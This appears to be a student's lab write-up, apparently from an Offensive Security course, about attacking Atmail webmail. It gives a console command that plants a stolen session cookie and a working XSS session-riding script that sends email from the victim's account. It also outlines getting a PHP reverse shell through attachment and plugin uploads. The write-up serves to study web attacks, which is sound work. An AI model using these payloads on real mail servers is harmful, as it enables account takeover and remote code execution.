Review Summary

1. Identify the web injection point with the provided tool. Grab the session cookie and set it in the browser through the following command in the browser console:

javascript:void(document.cookie="atmail6=1fp0fjq4aa8sm5if934b62ptv6");

2. Session Riding vs. Session Hijacking. Session hijacking steals the session token itself (as in step 1, where the cookie is copied into another browser); session riding leaves the token where it is and makes the victim's own browser send the requests.

3. Forge the request (the official tutorial uses sending an email as its example). To send an email through JavaScript, we could use the following code:

var email = "attacker@offsec.local";
var subject = "hacked!";
var message = "This is a test email!";
function send_email()
{
    // Atmail's compose endpoint accepts the message fields as GET parameters,
    // so a bare URL is enough to send mail from the victim's session.
    var uri = "/index.php/mail/composemessage/send/tabId/viewmessageTab1";
    var query_string = "?emailTo=" + email + "&emailSubject=" + subject + "&emailBodyHtml=" + message;
    var xhr = new XMLHttpRequest();
    // Same-origin request: the browser attaches the session cookie automatically.
    xhr.open("GET", uri + query_string, true);
    xhr.send(null);
}
send_email();

4. Code execution through uploading an attachment (PHP reverse shell).

5. Extra Mile:

Previously, we talked about an alternative path to remote code execution. That is, via the plugins. Research this and discover the requests that are needed to upload PHP code via this method. Then, use that as your remote code execution payload and combine it with your XSS to achieve a virtually unassisted remote shell on your Atmail target.

Let's dig into this problem. When I tried to upload a random .txt file through the Atmail admin page, I was told "invalid extension". It seems that I need to bypass the upload restriction. I had two ideas in mind: (1) look into the official documentation; (2) check the source code. From online forums I could see that users were uploading files with a .php extension, yet when I tried PHP pages those files were not uploaded correctly. Hence I looked into the source code. I won't include the full source code here, but the key points are:

  1. The target plugin must be in tgz format.
  2. The plugin is extracted to a temporary folder, created through the PHP function tempnam.
  3. A shell_exec call extracts the archive into the target location.